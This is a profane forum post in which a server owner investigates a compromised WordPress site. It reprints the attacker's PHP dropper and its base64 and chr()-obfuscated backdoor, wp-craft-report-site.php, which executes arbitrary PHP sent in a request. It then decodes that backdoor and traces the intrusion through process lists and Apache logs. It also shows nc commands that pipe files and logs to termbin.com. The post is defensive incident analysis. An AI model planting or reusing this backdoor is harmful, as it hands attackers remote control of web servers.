WordPress infected wp-craft-report-site.php adminer

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
First, what am I doing?

Code:
cd /tmp/

cat * | nc termbin.com 9999



Taking this off to another machine for inspection, volatile data:

Code:
a:2:{s:14:"162.158.89.172";a:2:{i:0;i:1577805458;i:1;i:1;}s:14:"162.158.91.230";a:2:{i:0;i:1577805459;i:1;i:1;}}<?php echo ":#009009#:";

$file_to_search = "sitemap.xml";

$dop = $_GET['ptz'];

@search_file($_SERVER['DOCUMENT_ROOT'].$dop,$file_to_search);







function search_file($dir,$file_to_search){



$search_array = array();



$files = scandir($dir);



foreach($files as $key => $value){



    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);



    if(!is_dir($path)) {

        if (strpos($value,$file_to_search) !== false) {



            $sitename = get_sitename($path);

        

            if($sitename != "null") {

            

                if (!array_key_exists($sitename, $search_array)) {

                    $st = make_sh_site(dirname($path),$sitename);

                    array_push($search_array, $sitename);

                }

                

            }

        



        }



    } else if($value != "." && $value != "..") {



        search_file($path, $file_to_search);



    }  

 } 

}



function get_sitename($file) {



    $g = file_get_contents($file);

    

    if (strpos($g,"<loc>") !== false) {

        

        preg_match('/<loc>(.*?)<\/loc>/s', $g, $matches, PREG_OFFSET_CAPTURE);

        $siten = $matches[1][0];

        $siten_t = str_replace("://","@",$siten);

        $pieces = explode("/", $siten_t);

        $siten_t3 = str_replace("@","://",$pieces[0]);

        return $siten_t3;

    }

    



    return "null";



}

function make_sh_site($dir,$site_name) {



    

    @file_put_contents($dir."/wp-craft-report-site.php",base64_decode('PD9waHAgaWYoaXNzZXQoJF9QT1NUW2Nocig5NykuY2hyKDExNSkuY2hyKDk3KS5jaHIoMTE4KS5jaHIoMTE1KS5jaHIoMTAwKS5jaHIoMTE4KS5jaHIoMTAwKS5jaHIoMTE1KV0pICYmIG1kNSgkX1BPU1RbY2hyKDEwOCkuY2hyKDEwMykuY2hyKDEwNykuY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwNCkuY2hyKDEwMCkuY2hyKDEwMikuY2hyKDEwNCldKSA9PSBjaHIoMTAxKS5jaHIoNTcpLmNocig1NSkuY2hyKDU2KS5jaHIoNTUpLmNocig5NykuY2hyKDEwMCkuY2hyKDk5KS5jaHIoNTMpLmNocig1MCkuY2hyKDU1KS5jaHIoNDkpLmNocig5OSkuY2hyKDk4KS5jaHIoNDgpLmNocigxMDIpLmNocig1NSkuY2hyKDU0KS5jaHIoNTMpLmNocig1MCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDQ4KS5jaHIoNTEpLmNocigxMDApLmNocig5NykuY2hyKDUxKS5jaHIoMTAyKS5jaHIoNTApLmNocigxMDApLmNocig5OSkpIHsgJGEgPSBjaHIoMTA5KS5jaHIoMTEwKTsgCSRuMSA9IGNocigxMDIpLmNocigxMDUpLmNocigxMDgpLmNocigxMDEpLmNocig5NSk7JG4yID0gY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDk1KTskbjMgPSAkbjEuJG4yLmNocig5OSkuY2hyKDExMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDEwMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDExNSk7JGIxID0gY2hyKDEwMCkuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKTskYjIgPSBjaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuJGIxOyAJJHoxID0gY2hyKDYwKS5jaHIoNjMpLmNocigxMTIpLmNocigxMDQpLmNocigxMTIpLmNocigzMik7IAkkejIgPSAkejEuJGIyKCRfUkVRVUVTVFtjaHIoMTAwKS5jaHIoNDkpXSk7IAkkejMgPSAkYjIoJF9SRVFVRVNUW2NocigxMDApLmNocig0OSldKTsgCUAkbjMoJGEsJHoyKTsgCUBpbmNsdWRlKCRhKTtAdW5saW5rKCRhKTsgCSRhID0gY2hyKDQ3KS5jaHIoMTE2KS5jaHIoMTA5KS5jaHIoMTEyKS5jaHIoNDcpLiRhOyAJQCRuMygkYSwkejIpOyAJQGluY2x1ZGUoJGEpO0B1bmxpbmsoJGEpO2RpZSgpOyAgfSBlbHNlIHsgJGNiYiA9IGNocig5OCkuY2hyKDk3KS5jaHIoMTE1KS5jaHIoMTAxKS5jaHIoNTQpLmNocig1MikuY2hyKDk1KS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTkpLmNocigxMTEpLmNocigxMDApLmNocigxMDEpOyBlY2hvICRjYmIoY2hyKDc4KS5jaHIoNjgpLmNocig2NSkuY2hyKDQ4KS5jaHIoNzYpLmNocig4MykuY2hyKDQ5KS5jaHIoMTA4KS5jaHIoOTkpLmNocigxMTApLmNocig3NCkuY2hyKDExOCkuY2hyKDk5KS5jaHIoMTAzKS5jaHIoNjEpLmNocig2MSkpOyB9'));

    

    $r = @file_get_contents($site_name."/wp-craft-report-site.php");

    if(strpos($r,"404--error") !== false){

        echo $site_name."/wp-craft-report-site.php<#>";

        return;

        

    }

    

    return $site_name;



    



}

echo "#already exist#:";



Okay, now I am not a dumb mother fuXXr - right? I know to grep for "decode" among "eval" and other kiddo commands.



So, I am looking at wp-craft-report-site.php with the base64. Let's decode?

Code:
PD9waHAgaWYoaXNzZXQoJF9QT1NUW2Nocig5NykuY2hyKDExNSkuY2hyKDk3KS5jaHIoMTE4KS5jaHIoMTE1KS5jaHIoMTAwKS5jaHIoMTE4KS5jaHIoMTAwKS5jaHIoMTE1KV0pICYmIG1kNSgkX1BPU1RbY2hyKDEwOCkuY2hyKDEwMykuY2hyKDEwNykuY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwNCkuY2hyKDEwMCkuY2hyKDEwMikuY2hyKDEwNCldKSA9PSBjaHIoMTAxKS5jaHIoNTcpLmNocig1NSkuY2hyKDU2KS5jaHIoNTUpLmNocig5NykuY2hyKDEwMCkuY2hyKDk5KS5jaHIoNTMpLmNocig1MCkuY2hyKDU1KS5jaHIoNDkpLmNocig5OSkuY2hyKDk4KS5jaHIoNDgpLmNocigxMDIpLmNocig1NSkuY2hyKDU0KS5jaHIoNTMpLmNocig1MCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDQ4KS5jaHIoNTEpLmNocigxMDApLmNocig5NykuY2hyKDUxKS5jaHIoMTAyKS5jaHIoNTApLmNocigxMDApLmNocig5OSkpIHsgJGEgPSBjaHIoMTA5KS5jaHIoMTEwKTsgCSRuMSA9IGNocigxMDIpLmNocigxMDUpLmNocigxMDgpLmNocigxMDEpLmNocig5NSk7JG4yID0gY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDk1KTskbjMgPSAkbjEuJG4yLmNocig5OSkuY2hyKDExMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDEwMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDExNSk7JGIxID0gY2hyKDEwMCkuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKTskYjIgPSBjaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuJGIxOyAJJHoxID0gY2hyKDYwKS5jaHIoNjMpLmNocigxMTIpLmNocigxMDQpLmNocigxMTIpLmNocigzMik7IAkkejIgPSAkejEuJGIyKCRfUkVRVUVTVFtjaHIoMTAwKS5jaHIoNDkpXSk7IAkkejMgPSAkYjIoJF9SRVFVRVNUW2NocigxMDApLmNocig0OSldKTsgCUAkbjMoJGEsJHoyKTsgCUBpbmNsdWRlKCRhKTtAdW5saW5rKCRhKTsgCSRhID0gY2hyKDQ3KS5jaHIoMTE2KS5jaHIoMTA5KS5jaHIoMTEyKS5jaHIoNDcpLiRhOyAJQCRuMygkYSwkejIpOyAJQGluY2x1ZGUoJGEpO0B1bmxpbmsoJGEpO2RpZSgpOyAgfSBlbHNlIHsgJGNiYiA9IGNocig5OCkuY2hyKDk3KS5jaHIoMTE1KS5jaHIoMTAxKS5jaHIoNTQpLmNocig1MikuY2hyKDk1KS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTkpLmNocigxMTEpLmNocigxMDApLmNocigxMDEpOyBlY2hvICRjYmIoY2hyKDc4KS5jaHIoNjgpLmNocig2NSkuY2hyKDQ4KS5jaHIoNzYpLmNocig4MykuY2hyKDQ5KS5jaHIoMTA4KS5jaHIoOTkpLmNocigxMTApLmNocig3NCkuY2hyKDExOCkuY2hyKDk5KS5jaHIoMTAzKS5jaHIoNjEpLmNocig2MSkpOyB9



Base64 decodes to:

Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110);     $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1;     $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);     $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]);     $z3 = $b2($_REQUEST[chr(100).chr(49)]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }



Awesome, more obfuscation.



Now we want to turn all these damn chr(1337)s to their actual character. Cool! Nice site over here does this stuff for us: https://www.plus2net.com/php_tutorial/string-chr.php



This is going to get fucking dumb.



Time 2 code PHP to create a bash script for us, lmao.. because fuck this.



Over here http://www.writephponline.com/ I am going to execute:



PHP:
<?php

$i=0;

echo "<table><tr><td>";

for($i==0;$i<=127;$i++){

echo " chr($i) = ".chr($i)."<br>"; 

if($i%20 == 0 and $i>19){echo "</td><td valign=top>";}

}

echo "</td></table>";

?>



Write your php you want to decode into a decode.txt file!



We can generate this by modifying:

Code:
sed -i 's/chr(0)//g' ./decode.txt
sed -i 's/chr(1)//g' ./decode.txt
sed -i 's/chr(2)//g' ./decode.txt
sed -i 's/chr(3)//g' ./decode.txt
sed -i 's/chr(4)//g' ./decode.txt
sed -i 's/chr(5)//g' ./decode.txt
sed -i 's/chr(6)//g' ./decode.txt
sed -i 's/chr(7)//g' ./decode.txt
sed -i 's/chr(8)//g' ./decode.txt
sed -i 's/chr(9)/ /g' ./decode.txt
sed -i 's/chr(10)/ /g' ./decode.txt
sed -i 's/chr(11)//g' ./decode.txt
sed -i 's/chr(12)//g' ./decode.txt
sed -i 's/chr(13)/ /g' ./decode.txt
sed -i 's/chr(14)//g' ./decode.txt
sed -i 's/chr(15)//g' ./decode.txt
sed -i 's/chr(16)//g' ./decode.txt
sed -i 's/chr(17)//g' ./decode.txt
sed -i 's/chr(18)//g' ./decode.txt
sed -i 's/chr(19)//g' ./decode.txt
sed -i 's/chr(20)//g' ./decode.txt
sed -i 's/chr(21)//g' ./decode.txt
sed -i 's/chr(22)//g' ./decode.txt
sed -i 's/chr(23)//g' ./decode.txt
sed -i 's/chr(24)//g' ./decode.txt
sed -i 's/chr(25)//g' ./decode.txt
sed -i 's/chr(26)//g' ./decode.txt
sed -i 's/chr(27)//g' ./decode.txt
sed -i 's/chr(28)//g' ./decode.txt
sed -i 's/chr(29)//g' ./decode.txt
sed -i 's/chr(30)//g' ./decode.txt
sed -i 's/chr(31)//g' ./decode.txt
sed -i 's/chr(32)/ /g' ./decode.txt
sed -i 's/chr(33)/!/g' ./decode.txt
sed -i 's/chr(34)/"/g' ./decode.txt
sed -i 's/chr(35)/#/g' ./decode.txt
sed -i 's/chr(36)/$/g' ./decode.txt
sed -i 's/chr(37)/%/g' ./decode.txt
sed -i 's/chr(38)/&/g' ./decode.txt
sed -i 's/chr(39)/'/g' ./decode.txt
sed -i 's/chr(40)/(/g' ./decode.txt
sed -i 's/chr(41)/)/g' ./decode.txt
sed -i 's/chr(42)/*/g' ./decode.txt
sed -i 's/chr(43)/+/g' ./decode.txt
sed -i 's/chr(44)/,/g' ./decode.txt
sed -i 's/chr(45)/-/g' ./decode.txt
sed -i 's/chr(46)/./g' ./decode.txt
sed -i 's/chr(47)///g' ./decode.txt
sed -i 's/chr(48)/0/g' ./decode.txt
sed -i 's/chr(49)/1/g' ./decode.txt
sed -i 's/chr(50)/2/g' ./decode.txt
sed -i 's/chr(51)/3/g' ./decode.txt
sed -i 's/chr(52)/4/g' ./decode.txt
sed -i 's/chr(53)/5/g' ./decode.txt
sed -i 's/chr(54)/6/g' ./decode.txt
sed -i 's/chr(55)/7/g' ./decode.txt
sed -i 's/chr(56)/8/g' ./decode.txt
sed -i 's/chr(57)/9/g' ./decode.txt
sed -i 's/chr(58)/:/g' ./decode.txt
sed -i 's/chr(59)/;/g' ./decode.txt
sed -i 's/chr(62)/>/g' ./decode.txt
sed -i 's/chr(63)/?/g' ./decode.txt
sed -i 's/chr(64)/@/g' ./decode.txt
sed -i 's/chr(65)/A/g' ./decode.txt
sed -i 's/chr(66)/B/g' ./decode.txt
sed -i 's/chr(67)/C/g' ./decode.txt
sed -i 's/chr(68)/D/g' ./decode.txt
sed -i 's/chr(69)/E/g' ./decode.txt
sed -i 's/chr(70)/F/g' ./decode.txt
sed -i 's/chr(71)/G/g' ./decode.txt
sed -i 's/chr(72)/H/g' ./decode.txt
sed -i 's/chr(73)/I/g' ./decode.txt
sed -i 's/chr(74)/J/g' ./decode.txt
sed -i 's/chr(75)/K/g' ./decode.txt
sed -i 's/chr(76)/L/g' ./decode.txt
sed -i 's/chr(77)/M/g' ./decode.txt
sed -i 's/chr(78)/N/g' ./decode.txt
sed -i 's/chr(79)/O/g' ./decode.txt
sed -i 's/chr(80)/P/g' ./decode.txt
sed -i 's/chr(81)/Q/g' ./decode.txt
sed -i 's/chr(82)/R/g' ./decode.txt
sed -i 's/chr(83)/S/g' ./decode.txt
sed -i 's/chr(84)/T/g' ./decode.txt
sed -i 's/chr(85)/U/g' ./decode.txt
sed -i 's/chr(86)/V/g' ./decode.txt
sed -i 's/chr(87)/W/g' ./decode.txt
sed -i 's/chr(88)/X/g' ./decode.txt
sed -i 's/chr(89)/Y/g' ./decode.txt
sed -i 's/chr(90)/Z/g' ./decode.txt
sed -i 's/chr(91)/[/g' ./decode.txt
sed -i 's/chr(92)/\/g' ./decode.txt
sed -i 's/chr(93)/]/g' ./decode.txt
sed -i 's/chr(94)/^/g' ./decode.txt
sed -i 's/chr(95)/_/g' ./decode.txt
sed -i 's/chr(96)/`/g' ./decode.txt
sed -i 's/chr(97)/a/g' ./decode.txt
sed -i 's/chr(98)/b/g' ./decode.txt
sed -i 's/chr(99)/c/g' ./decode.txt
sed -i 's/chr(100)/d/g' ./decode.txt
sed -i 's/chr(101)/e/g' ./decode.txt
sed -i 's/chr(102)/f/g' ./decode.txt
sed -i 's/chr(103)/g/g' ./decode.txt
sed -i 's/chr(104)/h/g' ./decode.txt
sed -i 's/chr(105)/i/g' ./decode.txt
sed -i 's/chr(106)/j/g' ./decode.txt
sed -i 's/chr(107)/k/g' ./decode.txt
sed -i 's/chr(108)/l/g' ./decode.txt
sed -i 's/chr(109)/m/g' ./decode.txt
sed -i 's/chr(110)/n/g' ./decode.txt
sed -i 's/chr(111)/o/g' ./decode.txt
sed -i 's/chr(112)/p/g' ./decode.txt
sed -i 's/chr(113)/q/g' ./decode.txt
sed -i 's/chr(114)/r/g' ./decode.txt
sed -i 's/chr(115)/s/g' ./decode.txt
sed -i 's/chr(116)/t/g' ./decode.txt
sed -i 's/chr(117)/u/g' ./decode.txt
sed -i 's/chr(118)/v/g' ./decode.txt
sed -i 's/chr(119)/w/g' ./decode.txt
sed -i 's/chr(120)/x/g' ./decode.txt
sed -i 's/chr(121)/y/g' ./decode.txt
sed -i 's/chr(122)/z/g' ./decode.txt
sed -i 's/chr(123)/{/g' ./decode.txt
sed -i 's/chr(124)/|/g' ./decode.txt
sed -i 's/chr(125)/}/g' ./decode.txt
sed -i 's/chr(126)/~/g' ./decode.txt
sed -i 's/chr(127)//g' ./decode.txt



Code:
<?php

$i=0;


for($i==0;$i<=127;$i++){

  echo "sed -i 's/chr($i)/".chr($i)."/g' ./decode.txt<br>"; 

if($i%20 == 0 and $i>19){echo "</td><td valign=top>";}

}

echo "</td></table>";

?>



Ghetttttoo PHP shytufff for fun, woo.



Results?



Code:
cat decode.txt
<?php if(isset($_POST[a.s.a.v.s.d.v.d.s]) && md5($_POST[l.g.k.f.g.h.d.f.h]) == e.9.7.8.7.a.d.c.5.2.7.1.c.b.0.f.7.6.5.2.9.4.5.0.3.d.a.3.f.2.d.c) { $a = m.n;     $n1 = f.i.l.e._;$n2 = p.u.t._;$n3 = $n1.$n2.c.o.n.t.e.n.t.s;$b1 = d.e.c.o.d.e;$b2 = b.a.s.e.6.4._.$b1;     $z1 = chr(60).?.p.h.p. ;     $z2 = $z1.$b2($_REQUEST[d.1]);     $z3 = $b2($_REQUEST[d.1]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).t.m.p.chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = b.a.s.e.6.4._.d.e.c.o.d.e; echo $cbb(N.D.A.0.L.S.1.l.c.n.J.v.c.g.chr(61).chr(61)); }



Just about every usage of "." is for combining the chr(1).chr(2) shit. Know what I should have done first? Remove "." anywhere between ) and c, fuck. Regex for the win.



I don't have patience for regex, so I am using Notepad++ to search for and replace "." with "" nothing.



Code:
<?php if(isset($_POST[asavsdvds]) && md5($_POST[lgkfghdfh]) == e9787adc5271cb0f765294503da3f2dc) { $a = mn;     $n1 = file_;$n2 = put_;$n3 = $n1$n2contents;$b1 = decode;$b2 = base64_$b1;     $z1 = chr(60)?php ;     $z2 = $z1$b2($_REQUEST[d1]);     $z3 = $b2($_REQUEST[d1]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47)tmpchr(47)$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = base64_decode; echo $cbb(NDA0LS1lcnJvcgchr(61)chr(61)); }



Apparently Ben from Sucuri already found this shit:




I found a piece of this artifact over at:

Code:
./wp-content/cache/supercache/MY_CLIENTS_WEB_DOMAIN.com/wp-craft-report.php







What about running processes?

Code:
UID        PID  PPID  C STIME TTY          TIME CMD

root         1     0  0  2019 ?        00:02:34 init [2]  

root         2     0  0  2019 ?        00:00:00 [kthreadd]

root         3     2  0  2019 ?        00:06:41 [ksoftirqd/0]

root         5     2  0  2019 ?        00:00:00 [kworker/u:0]

root         6     2  0  2019 ?        00:00:00 [migration/0]

root         7     2  0  2019 ?        00:01:07 [watchdog/0]

root         8     2  0  2019 ?        00:00:00 [cpuset]

root         9     2  0  2019 ?        00:00:00 [khelper]

root        10     2  0  2019 ?        00:00:00 [kdevtmpfs]

root        11     2  0  2019 ?        00:00:00 [netns]

root        12     2  0  2019 ?        00:00:33 [sync_supers]

root        13     2  0  2019 ?        00:00:00 [bdi-default]

root        14     2  0  2019 ?        00:00:00 [kintegrityd]

root        15     2  0  2019 ?        00:00:00 [kblockd]

root        17     2  0  2019 ?        00:00:05 [khungtaskd]

root        18     2  0  2019 ?        00:00:03 [kswapd0]

root        19     2  0  2019 ?        00:00:00 [vmstat]

root        20     2  0  2019 ?        00:00:00 [ksmd]

root        21     2  0  2019 ?        00:00:00 [khugepaged]

root        22     2  0  2019 ?        00:00:00 [fsnotify_mark]

root        23     2  0  2019 ?        00:00:00 [crypto]

root        84     2  0  2019 ?        00:00:00 [khubd]

root        94     2  0  2019 ?        00:00:00 [ata_sff]

root       110     2  0  2019 ?        00:00:00 [scsi_eh_0]

root       111     2  0  2019 ?        00:00:00 [scsi_eh_1]

root       118     2  0  2019 ?        00:00:00 [kworker/u:1]

root       140     2  0  2019 ?        00:03:28 [kjournald]

root       295     1  0  2019 ?        00:00:00 udevd --daemon

root       401   295  0  2019 ?        00:00:00 udevd --daemon

root       402   295  0  2019 ?        00:00:00 udevd --daemon

root       404     2  0  2019 ?        00:00:00 [kpsmoused]

root       418     2  0  2019 ?        00:23:01 [vballoon]

root      1812     1  0  2019 ?        00:11:54 /usr/sbin/rsyslogd -c5

root      1897     2  0  2019 ?        00:01:13 [flush-254:0]

root      1903     1  0  2019 ?        00:00:37 /usr/sbin/cron

root      2357     1  0  2019 ?        00:06:32 sendmail: MTA: accepting connections          

root      2593     1  0  2019 ?        00:08:25 /usr/sbin/sshd

root      2617     1  0  2019 tty1     00:00:00 /sbin/getty 38400 tty1

root      2618     1  0  2019 tty2     00:00:00 /sbin/getty 38400 tty2

root      2619     1  0  2019 tty3     00:00:00 /sbin/getty 38400 tty3

root      2620     1  0  2019 tty4     00:00:00 /sbin/getty 38400 tty4

root      2621     1  0  2019 tty5     00:00:00 /sbin/getty 38400 tty5

root      2622     1  0  2019 tty6     00:00:00 /sbin/getty 38400 tty6

root      5321     1  0  2019 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe

mysql     5648  5321  0  2019 ?        01:06:55 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

root      5649  5321  0  2019 ?        00:00:00 logger -t mysqld -p daemon.error

root     31247     1  0 Jan04 ?        00:02:37 /usr/sbin/apache2 -k start

www-data 23249 31247  0 Feb04 ?        00:00:14 /usr/sbin/apache2 -k start

www-data 24323 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start

www-data 27536 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start

www-data 27569 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start

www-data 27571 31247  0 Feb04 ?        00:00:09 /usr/sbin/apache2 -k start

www-data 27572 31247  0 Feb04 ?        00:00:08 /usr/sbin/apache2 -k start

www-data 27574 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start

www-data 27576 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start

www-data 27579 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start

www-data 29049 31247  0 Feb04 ?        00:00:07 /usr/sbin/apache2 -k start

root     16761     2  0 Feb05 ?        00:00:04 [kworker/0:0]

root     25372     2  0 Feb06 ?        00:00:02 [kworker/0:1]

root     13393  2593  0 13:43 ?        00:00:01 sshd: root@pts/0 

root     13401 13393  0 13:43 pts/0    00:00:02 -bash

root     14266 13401  0 14:16 pts/0    00:00:00 mail

root     14371 13401  0 14:20 pts/0    00:00:00 ps -ef --sort=start_time

root     14372 13401  0 14:20 pts/0    00:00:00 nc termbin.com 9999



Pay close attention to this Feb04/05/06 shit.. hmm. kk



cd /var/log



Now who has logged in?

Code:
grep -rnw './' -e 'Accepted password'



Nice m8, but what about inside of the zipped files?

Code:
root@vps91709:/var/log# zgrep -a Feb *gz | grep -v "root" | grep -v "sendmail" | grep -v "STARTTLS" | grep -v "localhost" | grep -v "CUSTOMER_NAME_HERE" | grep -v "mailer" | grep "kernel"
syslog.3.gz:Feb  4 12:56:34 vps91709 kernel: [11316599.087732] UDP: bad checksum. From 51.255.109.163:53592 to 158.69.206.75:5060 ulen 237



Hey, fuck you UDP protocol packet fuqqer.



-rw-r--r-- 1 www-data www-data 3.3K Feb 3 16:09 mn



We have a timeframe of Feb 3 our compromise began.



Now since I know this attack happened around a specific time, I can scrape my logs around then:

Code:
cat * | grep "03/Feb/2020:16:09" | nc termbin.com 9999



We know this hit my Apache server, so let's cd in there before running the above? "cd /var/log/apache2".. then run above.



Code:
162.158.74.102 - - [03/Feb/2020:16:09:19 -0500] "GET / HTTP/1.1" 200 6634 "-" "-"

108.162.216.45 - - [03/Feb/2020:16:09:20 -0500] "GET / HTTP/1.1" 200 6630 "-" "-"

162.158.74.246 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6653 "-" "-"

108.162.216.81 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"

141.101.77.11 - - [03/Feb/2020:16:09:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

108.162.216.131 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6646 "-" "-"

162.158.74.134 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"

162.158.74.250 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6631 "-" "-"

162.158.74.66 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6641 "-" "-"

141.101.77.11 - - [03/Feb/2020:16:09:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

::1 - - [03/Feb/2020:16:09:30 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"

::1 - - [03/Feb/2020:16:09:31 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"

172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "GET /wp-login.php HTTP/1.1" 200 2265 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"

172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "POST /wp-login.php HTTP/1.1" 200 2659 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"

141.101.104.224 - - [03/Feb/2020:16:09:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

172.69.55.163 - - [03/Feb/2020:16:09:56 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

172.69.55.79 - - [03/Feb/2020:16:09:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

::1 - - [03/Feb/2020:16:09:58 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"

163.172.44.118 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"

108.162.229.179 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 200 6645 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"



This fuqqer infected me last time, and I overlooked this infection clearing it off.







See this bullshit?

Now we know Dec 10 17:07 is a time of interest..



Code:
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
